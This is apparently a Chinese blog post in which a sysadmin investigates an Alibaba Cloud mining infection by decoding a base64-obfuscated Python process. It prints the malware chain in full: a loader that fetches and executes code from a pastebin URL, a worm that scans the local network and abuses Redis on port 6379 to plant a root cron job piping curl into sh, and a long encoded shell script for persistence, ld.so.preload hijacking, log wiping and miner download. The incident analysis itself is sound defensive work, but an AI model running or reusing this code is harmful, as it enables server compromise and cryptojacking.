公司阿里云连续四条预警,怀疑是被人黑了,并且用python程序干坏事,于是登录公司阿里云查看一波。
进程异常行为-Linux异常文件下载
敏感文件篡改-Linux共享库文件预加载配置文件可疑篡改
恶意进程(云查杀)-挖矿程序
进程异常行为-Python应用执行异常指令
因为有个进程异常行为-Python应用执行异常指令
先看看python程序相关进程有没有干坏事
ps -aux | grep python
结果发现三个相关程序
grep --color=auto python
/usr/bin/pytho -Es /usr/sbin/tuned -l -P
python -c import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))
ps -aux | grep python
查询是良民不管他/usr/sbin/tuned
python文件 vim /usr/sbin/tuned
看了一下这个文件感觉没有什么问题,但是由于我们服务器程序并没有用的python的地方,良民也给他干掉,把进程杀了 杀完之后研究一下这个东西到底干了什么,看命令是通过python程序执行了一个被base64加密的一个程序,下面把I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz
这个base64解码一下看看是什么东西。
百度base64 解码
随便找一个在线base64解码的看看干了什么事情,发现解码之后是一个python程序
#coding: utf-8
import urllib
import base64
d= 'https://pastebin.com/raw/nYBpuAxT'
try:
page=base64.b64decode(urllib.urlopen(d).read())
exec(page)
except:
pass
很明显这个python程序拿到了这个https://pastebin.com/raw/nYBpuAxT
这个地址的内容并且base64解码,然后运行这个程序,下面看看这个是个什么东西
IyEgL3Vzci9iaW4vZW52IHB5dGhvbgojY29kaW5nOiB1dGYtOAoKaW1wb3J0IHRocmVhZGluZwppbXBvcnQgc29ja2V0CmZyb20gcmUgaW1wb3J0IGZpbmRhbGwKaW1wb3J0IGh0dHBsaWIKCklQX0xJU1QgPSBbXQoKY2xhc3Mgc2Nhbm5lcih0aHJlYWRpbmcuVGhyZWFkKToKICAgIHRsaXN0ID0gW10KICAgIG1heHRocmVhZHMgPSAxMDAKICAgIGV2bnQgPSB0aHJlYWRpbmcuRXZlbnQoKQogICAgbGNrID0gdGhyZWFkaW5nLkxvY2soKQoKICAgIGRlZiBfX2luaXRfXyhzZWxmLGhvc3QpOgogICAgICAgIHRocmVhZGluZy5UaHJlYWQuX19pbml0X18oc2VsZikKICAgICAgICBzZWxmLmhvc3QgPSBob3N0CiAgICBkZWYgcnVuKHNlbGYpOgogICAgICAgIHRyeToKICAgICAgICAgICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX1NUUkVBTSkKICAgICAgICAgICAgcy5zZXR0aW1lb3V0KDUpCiAgICAgICAgICAgIHMuY29ubmVjdCgoc2VsZi5ob3N0LCA2Mzc5KSkKICAgICAgICAgICAgcy5zZW5kKCdzZXQgdGlnaHRzb2Z0ICJcXG5cXG5cXG4qLzEgKiAqICogKiByb290IGN1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXFxuXFxuXFxuIlxyXG4nKQogICAgICAgICAgICBzLnNlbmQoJ2NvbmZpZyBzZXQgZGlyIC9ldGMvY3Jvbi5kXHJcbicpCiAgICAgICAgICAgIHMuc2VuZCgnY29uZmlnIHNldCBkYmZpbGVuYW1lIHJvb3RcclxuJykKICAgICAgICAgICAgcy5zZW5kKCdzYXZlXHJcbicpCiAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgICAgIHBhc3MKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzY2FubmVyLnRsaXN0LnJlbW92ZShzZWxmKQogICAgICAgIGlmIGxlbihzY2FubmVyLnRsaXN0KSA8IHNjYW5uZXIubWF4dGhyZWFkczoKICAgICAgICAgICAgc2Nhbm5lci5ldm50LnNldCgpCiAgICAgICAgICAgIHNjYW5uZXIuZXZudC5jbGVhcigpCiAgICAgICAgc2Nhbm5lci5sY2sucmVsZWFzZSgpCgogICAgZGVmIG5ld3RocmVhZChob3N0KToKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBzYyA9IHNjYW5uZXIoaG9zdCkKICAgICAgICBzY2FubmVyLnRsaXN0LmFwcGVuZChzYykKICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICBzYy5zdGFydCgpCgogICAgbmV3dGhyZWFkID0gc3RhdGljbWV0aG9kKG5ld3RocmVhZCkKCmRlZiBnZXRfaXBfbGlzdCgpOgogICAgdHJ5OgogICAgICAgIHVybCA9ICdpZGVudC5tZScKICAgICAgICBjb25uID0gaHR0cGxpYi5IVFRQQ29ubmVjdGlvbih1cmwsIHBvcnQ9ODAsIHRpbWVvdXQ9MTApCiAgICAgICAgcmVxID0gY29ubi5yZXF1ZXN0KG1ldGhvZD0nR0VUJywgdXJsPScvJywgKQogICAgICAgIHJlc3VsdCA9IGNvbm4uZ2V0cmVzcG9uc2UoKQogICAgICAgIGlwMiA9IHJlc3VsdC5yZWFkKCkKICAgICAgICBpcHMyID0gZmluZGFsbChyJ1xkKy5cZCsuJywgaXAyKVswXQogICAgICAgIGZvciBpIGluIHJhbmdlKDAsIDI1NSk6CiAgICAgICAgICAgIGlwX2xpc3QxID0gKGlwczIgKyAoc3RyKGkpKSkKICAgICAgICAgICAgZm9yIGcgaW4gcmFuZ2UoMCwgMjU1KToKICAgICAgICAgICAgICAgIElQX0xJU1QuYXBwZW5kKGlwX2xpc3QxICsgJy4nICsgKHN0cihnKSkpCiAgICBleGNlcHQgRXhjZXB0aW9uOgogICAgICAgIHBhc3MKCmRlZiBydW5Qb3J0c2NhbigpOgogICAgZ2V0X2lwX2xpc3QoKQogICAgZm9yIGhvc3QgaW4gSVBfTElTVDoKICAgICAgICBzY2FubmVyLmxjay5hY3F1aXJlKCkKICAgICAgICBpZiBsZW4oc2Nhbm5lci50bGlzdCkgPj0gc2Nhbm5lci5tYXh0aHJlYWRzOgogICAgICAgICAgICBzY2FubmVyLmxjay5yZWxlYXNlKCkKICAgICAgICAgICAgc2Nhbm5lci5ldm50LndhaXQoKQogICAgICAgIGVsc2U6CiAgICAgICAgICAgIHNjYW5uZXIubGNrLnJlbGVhc2UoKQogICAgICAgIHNjYW5uZXIubmV3dGhyZWFkKGhvc3QpCiAgICBmb3IgdCBpbiBzY2FubmVyLnRsaXN0OgogICAgICAgIHQuam9pbigpCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcnVuUG9ydHNjYW4oKQoK
base64解码之后果然还是应该python程序
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
IP_LIST = []
class scanner(threading.Thread):
tlist = []
maxthreads = 100
evnt = threading.Event()
lck = threading.Lock()
def __init__(self,host):
threading.Thread.__init__(self)
self.host = host
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((self.host, 6379))
s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
s.send('config set dir /etc/cron.d\r\n')
s.send('config set dbfilename root\r\n')
s.send('save\r\n')
s.close()
except Exception:
pass
scanner.lck.acquire()
scanner.tlist.remove(self)
if len(scanner.tlist) < scanner.maxthreads:
scanner.evnt.set()
scanner.evnt.clear()
scanner.lck.release()
def newthread(host):
scanner.lck.acquire()
sc = scanner(host)
scanner.tlist.append(sc)
scanner.lck.release()
sc.start()
newthread = staticmethod(newthread)
def get_ip_list():
try:
url = 'ident.me'
conn = httplib.HTTPConnection(url, port=80, timeout=10)
req = conn.request(method='GET', url='/', )
result = conn.getresponse()
ip2 = result.read()
ips2 = findall(r'\d+.\d+.', ip2)[0]
for i in range(0, 255):
ip_list1 = (ips2 + (str(i)))
for g in range(0, 255):
IP_LIST.append(ip_list1 + '.' + (str(g)))
except Exception:
pass
def runPortscan():
get_ip_list()
for host in IP_LIST:
scanner.lck.acquire()
if len(scanner.tlist) >= scanner.maxthreads:
scanner.lck.release()
scanner.evnt.wait()
else:
scanner.lck.release()
scanner.newthread(host)
for t in scanner.tlist:
t.join()
if __name__ == "__main__":
runPortscan()
这个程序就稍微复杂一点了,一点点看吧,先分析一下他写的这些方法
http://ident.me
这个网址,我访问了一下,这个网址是用来获取被访问网址的ip的,拿到阿里云主机的ip了 ,通过正则拿到这个ip的前两位然后遍历后两位,比如我的ip是192.168.123.213,这个遍历出来一个 192.168.0.0 到 192.168.255.255的数组IP_LIST
set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n
这个 定时执行从https://pastebin.com/raw/xbY7p5Tb
拿下脚本并且执行 6379
并发送 定时执行从https://pastebin.com/raw/xbY7p5Tb
拿下脚本的信息 https://pastebin.com/raw/xbY7p5Tb
脚本的内容:/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/uuYVPLXd|/usr/bin/base64 -d|/bin/bash
从https://pastebin.com/raw/uuYVPLXd
拿下内容并base64解密执行
IyEvYmluL2Jhc2gKU0hFTEw9L2Jpbi9zaApQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpbgoKZnVuY3Rpb24ga2lsbHMoKSB7CnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIHduVEtZZyAmJiBwa2lsbCBkZGcqICYmIHJtIC1yZiAvdG1wL2RkZyogJiYgcm0gLXJmIC90bXAvd25US1lnCnJtIC1yZiAvYm9vdC9ncnViL2RlYW1vbiAmJiBybSAtcmYgL2Jvb3QvZ3J1Yi9kaXNrX2dlbml1cwpybSAtcmYgL3RtcC8qaW5kZXhfYmFrKgpybSAtcmYgL3RtcC8qaHR0cGQuY29uZioKcm0gLXJmIC90bXAvKmh0dHBkLmNvbmYKcm0gLXJmIC90bXAvYTdiMTA0YzI3MApwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJtaW5lLm1vbmVyb3Bvb2wuY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjgwODAifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6MzMzMyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgIm1vbmVyb2hhc2guY29tInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiL3RtcC9hN2IxMDRjMjcwInxhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yLmNyeXB0by1wb29sLmZyOjY2NjYifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXIuY3J5cHRvLXBvb2wuZnI6Nzc3NyJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtci5jcnlwdG8tcG9vbC5mcjo0NDMifGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJzdHJhdHVtLmYycG9vbC5jb206ODg4OCJ8YXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcnBvb2wuZXUiIHwgYXdrICd7cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05CnBzIGF1eGZ8Z3JlcCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOQpwcyBhdXhmfGdyZXAgLXYgZ3JlcHxncmVwICJ4bXJpZ0RhZW1vbiIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yaWdNaW5lciIgfCBhd2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkKcGtpbGwgLWYgYmlvc2V0amVua2lucwpwa2lsbCAtZiBBblhxVi55YW0KcGtpbGwgLWYgeG1yaWdEYWVtb24KcGtpbGwgLWYgeG1yaWdNaW5lcgpwa2lsbCAtZiB4bXJpZwpwa2lsbCAtZiBMb29wYmFjawpwa2lsbCAtZiBhcGFjZWhhCnBraWxsIC1mIGNyeXB0b25pZ2h0CnBraWxsIC1mIHN0cmF0dW0KcGtpbGwgLWYgbWl4bmVyZHgKcGtpbGwgLWYgcGVyZm9ybWVkbApwa2lsbCAtZiBKbktpaEdqbgpwa2lsbCAtZiBpcnFiYTJhbmMxCnBraWxsIC1mIGlycWJhNXhuYzEKcGtpbGwgLWYgaXJxYm5jMQpwa2lsbCAtZiBpcjI5eGMxCnBraWxsIC1mIGNvbm5zCnBraWxsIC1mIGlycWJhbGFuY2UKcGtpbGwgLWYgY3J5cHRvLXBvb2wKcGtpbGwgLWYgbWluZXhtcgpwa2lsbCAtZiBYSm5Sagpwa2lsbCAtZiBOWExBaQpwa2lsbCAtZiBCSTV6agpwa2lsbCAtZiBhc2tkbGpscXcKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpwa2lsbCAtZiBHdWFyZC5zaApwa2lsbCAtZiB5c2F5ZGgKcGtpbGwgLWYgYm9ubnMKcGtpbGwgLWYgZG9ubnMKcGtpbGwgLWYga3hqZApwa2lsbCAtZiBEdWNrLnNoCnBraWxsIC1mIGJvbm4uc2gKcGtpbGwgLWYgY29ubi5zaApwa2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYga3cuc2gKcGtpbGwgLWYgcHJvLnNoCnBraWxsIC1mIHBvbGtpdGQKcGtpbGwgLWYgYWNwaWQKcGtpbGwgLWYgaWNiNW8KcGtpbGwgLWYgbm9weGkKcGtpbGwgLWYgaXJxYmFsYW5jMQpwa2lsbCAtZiBtaW5lcmQKcGtpbGwgLWYgaTU4Ngpwa2lsbCAtZiBnZGRyCnBraWxsIC1mIG1zdHhtcgpwa2lsbCAtZiBkZGcuMjAxMQpwa2lsbCAtZiB3blRLWWcKcGtpbGwgLWYgZGVhbW9uCnBraWxsIC1mIGRpc2tfZ2VuaXVzCnBraWxsIC1mIHNvdXJwbHVtCnBraWxsIC1mIGJhc2h4CnBraWxsIC1mIGJhc2hnCnBraWxsIC1mIGJhc2hlCnBraWxsIC1mIGJhc2hmCnBraWxsIC1mIGJhc2hoCnBraWxsIC1mIFhiYXNoWQpwa2lsbCAtZiBsaWJhcGFjaGUKcm0gLXJmIC90bXAvaHR0cGQuY29uZgpybSAtcmYgL3RtcC9jb25uCnJtIC1yZiAvdG1wL3Jvb3Quc2ggL3RtcC9wb29scy50eHQgL3RtcC9saWJhcGFjaGUgL3RtcC9jb25maWcuanNvbiAvdG1wL2Jhc2hmIC90bXAvYmFzaGcgL3RtcC9saWJhcGFjaGUKcm0gLXJmIC90bXAvY29ubnMKcm0gLWYgL3RtcC9pcnEuc2gKcm0gLWYgL3RtcC9pcnFiYWxhbmMxCnJtIC1mIC90bXAvaXJxCnJtIC1mIC90bXAva3dvcmtlcmRzIC9iaW4va3dvcmtlcmRzIC9iaW4vY29uZmlnLmpzb24KbmV0c3RhdCAtYW5wIHwgZ3JlcCA2OS4yOC41NS44Njo0NDMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAzMzMzIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDU1NTUgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCA2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05Cm5ldHN0YXQgLWFucCB8IGdyZXAgNzc3NyB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDMzNDcgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKbmV0c3RhdCAtYW5wIHwgZ3JlcCAxNDQ0NCB8YXdrICd7cHJpbnQgJDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOQpuZXRzdGF0IC1hbnAgfCBncmVwIDUuMTk2LjIyNS4yMjIgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAtRidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkKeT0kKHBzIGF1eCB8IGdyZXAgLXYgZ3JlcCB8IGdyZXAga3dvcmtlcmRzIHwgd2MgLWwgKQppZiBbICR7eX0gLWVxIDAgXTt0aGVuCgluZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05CmZpCn0KCmZ1bmN0aW9uIHN5c3RlbSgpIHsKCWlmIFsgISAtZiAiL2Jpbi9odHRwZG5zIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLW8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlpZiBbICEgLWYgIi9iaW4vaHR0cGRucyIgXTsgdGhlbgoJCQl3Z2V0ICBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvNjk4RDdrWlUgLU8gL2Jpbi9odHRwZG5zICYmIGNobW9kIDc1NSAvYmluL2h0dHBkbnMKCQlmaQoJCXNlZCAtaSAnJGQnIC9ldGMvY3JvbnRhYiAmJiBlY2hvIC1lICIqICovNiAqICogKiByb290IC9iaW4vc2ggL2Jpbi9odHRwZG5zIiA+PiAvZXRjL2Nyb250YWIKCWZpCgkJCn0KCmZ1bmN0aW9uIHRvcCgpIHsKCWlmIFsgISAtZiAiL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvIiBdOyB0aGVuCgkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjUvMTUzNTU5NTQyN3gtMTQwNDgxNzcxMi5qcGcgLW8gL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvICYmIGNobW9kIDc1NSAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28KCQlpZiBbICEgLWYgIi91c3IvbG9jYWwvbGliL2xpYm50cC5zbyIgXTsgdGhlbgoJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2NS8xNTM1NTk1NDI3eC0xNDA0ODE3NzEyLmpwZyAtTyAvdXNyL2xvY2FsL2xpYi9saWJudHAuc28gJiYgY2htb2QgNzU1IC91c3IvbG9jYWwvbGliL2xpYm50cC5zbwoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2xkLnNvLnByZWxvYWQiIF07IHRoZW4KCQllY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+IC9ldGMvbGQuc28ucHJlbG9hZAoJZWxzZQoJCXNlZCAtaSAnJGQnIC9ldGMvbGQuc28ucHJlbG9hZCAmJiBlY2hvIC91c3IvbG9jYWwvbGliL2xpYm50cC5zbyA+PiAvZXRjL2xkLnNvLnByZWxvYWQKCWZpCgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvbGQuc28ucHJlbG9hZAoJdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdXNyL2xvY2FsL2xpYi9saWJqZGsuc28KCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Vzci9sb2NhbC9saWIvbGlibnRwLnNvCgllY2hvIDA+L3Zhci9zcG9vbC9tYWlsL3Jvb3QKCWVjaG8gMD4vdmFyL2xvZy93dG1wCgllY2hvIDA+L3Zhci9sb2cvc2VjdXJlCgllY2hvIDA+L3Zhci9sb2cvY3Jvbgp9CgpmdW5jdGlvbiBweXRob24oKSB7Cglub2h1cCBweXRob24gLWMgImltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKCdJMk52WkdsdVp6b2dkWFJtTFRnS2FXMXdiM0owSUhWeWJHeHBZZ3BwYlhCdmNuUWdZbUZ6WlRZMENncGtQU0FuYUhSMGNITTZMeTl3WVhOMFpXSnBiaTVqYjIwdmNtRjNMMjVaUW5CMVFYaFVKd3AwY25rNkNpQWdJQ0J3WVdkbFBXSmhjMlUyTkM1aU5qUmtaV052WkdVb2RYSnNiR2xpTG5WeWJHOXdaVzRvWkNrdWNtVmhaQ2dwS1FvZ0lDQWdaWGhsWXlod1lXZGxLUXBsZUdObGNIUTZDaUFnSUNCd1lYTnonKSkiID4vZGV2L251bGwgMj4mMSAmCgl0b3VjaCAvdG1wLy50bXBhCn0KCmZ1bmN0aW9uIGVjaG9jcm9uKCkgewoJZWNobyAtZSAiKi8xMCAqICogKiAqIHJvb3QgL2Jpbi9jaG1vZCA3NTUgL3Vzci9iaW4vY3VybCAmJiAvdXNyL2Jpbi9jdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC9ldGMvY3Jvbi5kL3Jvb3QKCXRvdWNoIC1hY21yIC9iaW4vc2ggL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9yb290Cgl0b3VjaCAtYWNtciAvYmluL3NoIC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLW8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvdG1wL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5NTEyN3gtMTQwNDc2NDI0Ny5qcGcgLU8gL3RtcC9rd29ya2VyZHMgJiYgY2htb2QgK3ggL3RtcC9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC90bXAva3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBkb3dubG9hZHJ1bnhtKCkgewoJcG09JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG19IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL2Jpbi9jb25maWcuanNvbiIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtbyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJaWYgWyAhIC1mICIvYmluL2NvbmZpZy5qc29uIiBdOyB0aGVuCgkJCQl3Z2V0IGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM1OC8xNTM0NDk2MDIyeC0xNDA0NzY0NTgzLmpwZyAtTyAvYmluL2NvbmZpZy5qc29uICYmIGNobW9kICt4IC9iaW4vY29uZmlnLmpzb24KCQkJZmkKCQlmaQoJCWlmIFsgISAtZiAiL2Jpbi9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9Cgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWlmIFsgISAtZiAiL3RtcC8udG1wYSIgXTsgdGhlbgoJCXJtIC1yZiAvdG1wLy50bXAKCQlweXRob24KCWZpCglraWxscwoJZG93bmxvYWRydW4KCWVjaG9jcm9uCglzeXN0ZW0KCXRvcAoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
base64解密后发现是这样一个shell,这个应该就是最终要干的坏事了
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function kills() {
pkill -f sourplum
pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg
rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius
rm -rf /tmp/*index_bak*
rm -rf /tmp/*httpd.conf*
rm -rf /tmp/*httpd.conf
rm -rf /tmp/a7b104c270
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
